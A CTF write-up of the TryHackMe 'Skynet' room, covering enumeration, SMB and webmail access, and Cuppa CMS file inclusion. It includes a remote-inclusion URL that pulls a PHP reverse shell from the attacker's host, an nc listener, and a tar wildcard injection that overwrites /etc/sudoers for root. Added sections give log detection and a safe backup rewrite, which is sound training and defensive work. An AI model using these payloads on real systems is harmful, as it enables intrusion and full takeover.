CTF : Skynet

CTF Skynet writeup. Source: THM. Announced difficulty level: Easy

Posted by Boula-Bytes on 13 April 2023


Information

  • IP: 10.10.221.206
  • MYIP: 10.11.22.97

First enumeration

Basics

  • NMAP
```console
$ nmap -p22,80,110,139,143,445 -A 10.10.221.206
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-13 21:43 CEST
Nmap scan report for 10.10.221.206
Host is up (0.031s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 992331bbb1e943b756944cb9e82146c5 (RSA)
|   256 57c07502712d193183dbe4fe679668cf (ECDSA)
|_  256 46fa4efc10a54f5757d06d54f6c34dfe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: AUTH-RESP-CODE TOP PIPELINING UIDL RESP-CODES CAPA SASL
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: IDLE listed ID SASL-IR ENABLE LOGINDISABLEDA0001 LOGIN-REFERRALS OK IMAP4rev1 more have capabilities post-login LITERAL+ Pre-login
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 1s
| smb2-time:
|   date: 2023-04-13T19:44:10
|_  start_date: N/A
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
|   311:
|_    Message signing enabled but not required
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2023-04-13T14:44:10-05:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.50 seconds
```

Vulnerabilities search

First, let's explore the SMB shares:

```console
$ enum4linux -a 10.10.221.206
[...]
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
[...]
S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-513 SKYNET\None (Domain Group)
S-1-5-21-2393614426-3774336851-1116533619-1000 SKYNET\milesdyson (Local User)
[...]
```

There is a wide-open share named anonymous, let's have a look:

```console
$ smbclient //10.10.221.206/anonymous -U Anonymous
smb: \> ls
  .                                   D        0  Thu Nov 26 17:04:00 2020
  ..                                  D        0  Tue Sep 17 09:20:17 2019
  attention.txt                       N      163  Wed Sep 18 05:04:59 2019
  logs                                D        0  Wed Sep 18 06:42:16 2019

		9204224 blocks of size 1024. 5831504 blocks available
smb: \> get attention.txt
smb: \> cd logs
smb: \logs\> get log1.txt
smb: \logs\> get log2.txt
smb: \logs\> get log3.txt
exit
```

Here is what we found:

```console
$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
```

```console
$ cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
```

log1.txt seems to be a password list.

That's all for SMB.

Now we can turn to the web service:

```console
$ gobuster dir -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.221.206/
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.221.206/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2023/04/13 22:31:13 Starting gobuster in directory enumeration mode
===============================================================
/admin                (Status: 403) [Size: 278]
/css                  (Status: 403) [Size: 278]
/js                   (Status: 403) [Size: 278]
/config               (Status: 403) [Size: 278]
/ai                   (Status: 403) [Size: 278]
/squirrelmail         (Status: 200) [Size: 2912]
```

SquirrelMail is a webmail client, so we can try to find milesdyson's password.

Using the passwords we found in log1.txt, we manage to log in.

Miles received an email containing his new Samba password.

So, we can now explore his shared folder:

```console
$ smbclient //10.10.221.206/milesdyson -U milesdyson
smb: \> cd notes
smb: \notes\> ls
  .                                      D        0  Tue Sep 17 11:18:40 2019
  ..                                     D        0  Tue Sep 17 11:05:47 2019
  3.01 Search.md                         N    65601  Tue Sep 17 11:01:29 2019
  4.01 Agent-Based Models.md             N     5683  Tue Sep 17 11:01:29 2019
  2.08 In Practice.md                    N     7949  Tue Sep 17 11:01:29 2019
  0.00 Cover.md                          N     3114  Tue Sep 17 11:01:29 2019
  1.02 Linear Algebra.md                 N    70314  Tue Sep 17 11:01:29 2019
  important.txt                          N      117  Tue Sep 17 11:18:39 2019
  6.01 pandas.md                         N     9221  Tue Sep 17 11:01:29 2019
  3.00 Artificial Intelligence.md        N       33  Tue Sep 17 11:01:29 2019
  2.01 Overview.md                       N     1165  Tue Sep 17 11:01:29 2019
  3.02 Planning.md                       N    71657  Tue Sep 17 11:01:29 2019
  1.04 Probability.md                    N    62712  Tue Sep 17 11:01:29 2019
  2.06 Natural Language Processing.md    N    82633  Tue Sep 17 11:01:29 2019
  2.00 Machine Learning.md               N       26  Tue Sep 17 11:01:29 2019
  1.03 Calculus.md                       N    40779  Tue Sep 17 11:01:29 2019
  3.03 Reinforcement Learning.md         N    25119  Tue Sep 17 11:01:29 2019
  1.08 Probabilistic Graphical Models.md N    81655  Tue Sep 17 11:01:29 2019
  1.06 Bayesian Statistics.md            N    39554  Tue Sep 17 11:01:29 2019
  6.00 Appendices.md                     N       20  Tue Sep 17 11:01:29 2019
  1.01 Functions.md                      N     7627  Tue Sep 17 11:01:29 2019
  2.03 Neural Nets.md                    N   144726  Tue Sep 17 11:01:29 2019
  2.04 Model Selection.md                N    33383  Tue Sep 17 11:01:29 2019
  2.02 Supervised Learning.md            N    94287  Tue Sep 17 11:01:29 2019
  4.00 Simulation.md                     N       20  Tue Sep 17 11:01:29 2019
  3.05 In Practice.md                    N     1123  Tue Sep 17 11:01:29 2019
  1.07 Graphs.md                         N     5110  Tue Sep 17 11:01:29 2019
  2.07 Unsupervised Learning.md          N    21579  Tue Sep 17 11:01:29 2019
  2.05 Bayesian Learning.md              N    39443  Tue Sep 17 11:01:29 2019
  5.03 Anonymization.md                  N     2516  Tue Sep 17 11:01:29 2019
  5.01 Process.md                        N     5788  Tue Sep 17 11:01:29 2019
  1.09 Optimization.md                   N    25823  Tue Sep 17 11:01:29 2019
  1.05 Statistics.md                     N    64291  Tue Sep 17 11:01:29 2019
  5.02 Visualization.md                  N      940  Tue Sep 17 11:01:29 2019
  5.00 In Practice.md                    N       21  Tue Sep 17 11:01:29 2019
  4.02 Nonlinear Dynamics.md             N    44601  Tue Sep 17 11:01:29 2019
  1.10 Algorithms.md                     N    28790  Tue Sep 17 11:01:29 2019
  3.04 Filtering.md                      N    13360  Tue Sep 17 11:01:29 2019
  1.00 Foundations.md                    N       22  Tue Sep 17 11:01:29 2019
smb: \notes\> get important.txt
exit
```

```console
$ cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
```

Alright, we have a hidden directory on the web server.

Let's explore it:

```console
$ gobuster dir -r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.221.206/45kra24zxs28v3yd
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.221.206/45kra24zxs28v3yd
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2023/04/13 22:46:55 Starting gobuster in directory enumeration mode
===============================================================
/administrator        (Status: 200) [Size: 4945]
```

/administrator is the login page of the "beta CMS" from important.txt, Cuppa CMS, so let's look for known exploits:

```console
$ searchsploit cuppa
------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                       |  Path
------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                      | php/webapps/25971.txt
------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ searchsploit -m php/webapps/25971.txt
```

As the exploit file explains, the urlConfig parameter is included without validation, so we can read arbitrary local files:

http://10.10.221.206/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Exploit

So I prepared a PHP reverse shell (shell.php) and served it from my machine with:

```shell
python3 -m http.server 8000
```

Then, still on the attacker host, a listener for the reverse shell:

```shell
nc -nlvp 1234
```

And in the browser, the same parameter now pointed at the remote file:

http://10.10.221.206/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.22.97:8000/shell.php

And we get a shell :)
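Both requests above leave an obvious trace in the Apache access log. As an added example (not part of the original writeup), here is a small POSIX shell check that flags urlConfig values carrying a traversal sequence or a URL scheme, run over constructed sample log lines; the combined log format and the sample entries are assumptions.

```shell
#!/bin/sh
# Added example, not from the original writeup. Detection for the two Cuppa CMS
# requests shown in the writeup as they would appear in an Apache access log.
# The five log lines are constructed samples (combined log format assumed).
SAMPLE_LOG='10.11.22.97 - - [13/Apr/2023:22:50:01 +0200] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd HTTP/1.1" 200 1744 "-" "Mozilla/5.0"
10.11.22.97 - - [13/Apr/2023:22:55:12 +0200] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.11.22.97:8000/shell.php HTTP/1.1" 200 52 "-" "Mozilla/5.0"
10.10.10.5 - - [13/Apr/2023:22:56:40 +0200] "GET /45kra24zxs28v3yd/administrator/index.php HTTP/1.1" 200 4945 "-" "Mozilla/5.0"
10.10.10.5 - - [13/Apr/2023:22:57:03 +0200] "GET /45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1744 "-" "Mozilla/5.0"
10.10.10.5 - - [13/Apr/2023:22:58:11 +0200] "GET /squirrelmail/src/login.php HTTP/1.1" 200 2912 "-" "Mozilla/5.0"'

# Print every stdin line whose urlConfig value either walks up the tree
# ("../", raw or percent-encoded: local file inclusion) or starts with a
# scheme such as http:// or php:// (remote file / stream-wrapper inclusion).
# Exit status is grep's: 0 when at least one line was flagged, 1 otherwise.
flag_file_inclusion() {
    grep -iE 'urlConfig=([^ &"]*(\.\.|%2e%2e)(/|%2f)|(https?|ftp|php|data|expect)(:|%3a))'
}

# Count the flagged lines in a log passed as the first argument.
count_flagged() {
    printf '%s\n' "$1" | flag_file_inclusion | wc -l | tr -d ' '
}

# Stand-alone run: show the hits in the sample, then the total.
printf '%s\n' "$SAMPLE_LOG" | flag_file_inclusion
echo "flagged: $(count_flagged "$SAMPLE_LOG")"
```

On a real server the same check would read `/var/log/apache2/access.log` on stdin; a legitimate value such as `urlConfig=config.php` is not flagged.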

Privilege escalation

Enumeration for privesc

There is a cron job run as root every minute:

```
*/1 * * * * root /home/milesdyson/backups/backup.sh
```

```console
$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
```

Exploit

We can abuse the wildcard: the shell expands `*` before tar runs, so any file in /var/www/html whose name looks like a tar option is passed to tar as an option:

```shell
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "" > "--checkpoint-action=exec=sh privesc.sh"
echo "" > --checkpoint=1
```

Then we wait a minute :)
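For the defender, the fix is to stop handing tar a shell glob. As an added example (not the room's backup.sh), here is the same backup written with `-C` and a literal member name, plus a pre-flight check for option-shaped file names, exercised on a constructed web root; the helper names are assumptions.

```shell
#!/bin/sh
# Added example, not the room's backup.sh. The original runs
# "cd /var/www/html; tar cf backup.tgz *", so the shell expands "*" and a file
# named "--checkpoint=1" reaches tar as an option. The safe form below never
# globs: tar gets -C and the literal member ".", so such a name is only data.

# Pre-flight check: list top-level entries of $1 whose name begins with "-",
# i.e. names a globbing "tar cf out *" would have parsed as options.
# Prints them one per line; returns 1 if any exist, 0 otherwise.
find_option_like_names() {
    hits=$(find "$1" -mindepth 1 -maxdepth 1 -name '-*')
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Archive directory $1 into $2 without a glob: -C changes into the directory
# and "." is the single, literal member name tar sees.
safe_backup() {
    tar -cf "$2" -C "$1" .
}

# Build a throwaway web root (constructed) holding a real file plus the two
# option-shaped names from the writeup. Had tar honoured the "action", it
# would have created "pwned" inside the root, which is what callers check.
make_demo_root() {
    root=$(mktemp -d)
    echo '<?php echo "hi";' > "$root/index.php"
    : > "$root/--checkpoint=1"
    : > "$root/--checkpoint-action=exec=touch pwned"
    printf '%s\n' "$root"
}

# Stand-alone run: warn about option-like names, back up, list the archive.
root=$(make_demo_root)
find_option_like_names "$root" || echo "option-shaped names present; using -C form"
safe_backup "$root" "$root.tgz"
tar -tf "$root.tgz"
[ -e "$root/pwned" ] && echo "tar executed the action!" || echo "no action executed"
rm -rf "$root" "$root.tgz"
```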

And now:

```console
$ sudo -i
# cat root.txt
```

\o/